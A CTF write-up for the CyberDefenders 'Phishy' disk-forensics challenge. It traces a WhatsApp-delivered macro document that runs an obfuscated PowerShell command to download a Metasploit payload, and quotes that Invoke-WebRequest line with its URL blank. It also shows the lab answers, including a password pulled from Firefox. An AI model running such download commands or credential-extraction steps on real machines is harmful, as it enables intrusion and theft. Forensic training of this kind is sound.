Phishy CTF Writeup

Ali Alaa
5 min readJun 18



Hello dudes,
I hope to find you well.

This is Ali Alaa and this is Phishy writeup for CyberDefenders platform’s challenge.

This is a Disk Forensics challenge and if you wanna find more about this topic you can try Phishy challenge.

So, lets start….

First Question: What is the hostname of the victim machine?

First thing first I must load image at FTK imager to access data.

Here we go I begun explore data and first clue came in my mind to see registry hives so, lets export SYSTEM hive I found it under this directory “C:\Windows\System32\config” and other hives.


Then I loaded this hive in Registry Explorer.


Here we go, the answer is : WIN-NF3JQEU4G0T

Second Question: What is the messaging app installed on the victim machine?

Download folder is a good place to see to know what previous apps were downloaded to install and also program files & (x86) where installed so, I navigated firstly to download folder and I found this app


This clue confirmed that he used Whatsapp to communicated.

Another clue here “\Users\Semah\AppData\Local\WhatsApp\

Here we go, the answer is :Whatsapp

Third Question: The attacker tricked the victim into downloading a malicious document. Provide the full download URL.

Here I must see where data related to Whatsapp stored form our perspective as DFIR these data can be artifacts we can use to solve case.

So, I navigated to “C:\Users\Semah\AppData\Roaming\WhatsApp” where data stored

Whatsapp artifacts

Then I found “Databases” folder hold all artifacts I needed but most important one is “msgstore.db” that hold chat messages. I exported these files then use “WhatsAppViewer” to access this db file.

WhatsAppViewer with chat

So, I found attacker send to victim a tricky link to doc that hold all winners.

Here we go, the answer is :

Forth Question: Multiple streams contain macros in the document. Provide the number of the highest stream.

Form previous question I got the link “ means that file downloaded and first place came in mind is “Downloads” folder.

Clue of IPhone-Winners.doc

I tried to open it but unfortunately I can’t 😢

I got form question itself a word I didn’t face before so, I’ll learn
new topic lets google it ….

After I got needed knowledge I knew what I had to do..

I used “OLEdump” to dump linked or embedded objects form file.

OLEdump output

Streams contain marcos are indicated with uppercase “M” so, 9 and 10 are streams needed. After I compared 2 streams I found 10 is highest with 5581.

Here we go, the answer is : 10

Fifth Question: The macro executed a program. Provide the program name?

Here I tried to see content of these 2 streams so, l tried to analysis stream 9 first

Stream 9

Here I found “Document_open()” that mean this if calling another function so, lets try analysis “stream 10” ..

Stream 10

Function obfuscated and I must to deobfuscate code


It seams it’s a “Powershell ”command.

Here we go, the answer is : Powershell

Sixth Question: The macro downloaded a malicious file. Provide the full download URL.

I got a poweshell encoded command so, let’s read it with EncodedCommad in powershell and output content in text file called “poc.txt”.

powershell command

Here is a clue of evidence

portion of code

Here we go, the answer is :

Seventh Question: Where was the malicious file downloaded to? (Provide the full path)

As I read powershell with EncodedCommad I go content in “poc.txt” with this command

portion of code

“invoke-webrequest -Uri ‘' -OutFile ‘C:\Temp\IPhone.exe’ -UseDefault Credentials”

So, attaker after downloaded exe he sent output to C:\Temp\IPhone.exe

Here we go, the answer is : C:\Temp\IPhone.exe

Eighth Question: What is the name of the framework used to create the malware?

Here I did static analysis for “IPhone.exe” with virustotal and searched in all security vendors’ analysis


Here I found “Trojan.Meterpreter” is a Metasploit attack payload.

Here we go, the answer is : Metasploit

Ninth Question: What is the attacker’s IP address?

I found it in “Network Related” in hybrid analysis.

Here we go, the answer is :

Tenth Questions: The fake giveaway used a login page to collect user information. Provide the full URL of the login page?

I got he used Mozila firefox browser so, I navigated to profile and extracted needed artifact “places.sqlite” that holds all visited urls.

Visted URLs

Here we go, the answer is :

Eleventh Question: What is the password the user submitted to the login page?

I used “passwordfox” to extract password from profile. I selected profile then pyb51x2n.default-release that holds all artifacts.

*Passwordfox automated tool to extract passwords from Mozila firefox.


Here we go, the answer is : GacsriicUZMY4xiAF4yl

At the end ,
I hope you enjoyed this writeup ❤️.

Stay in touch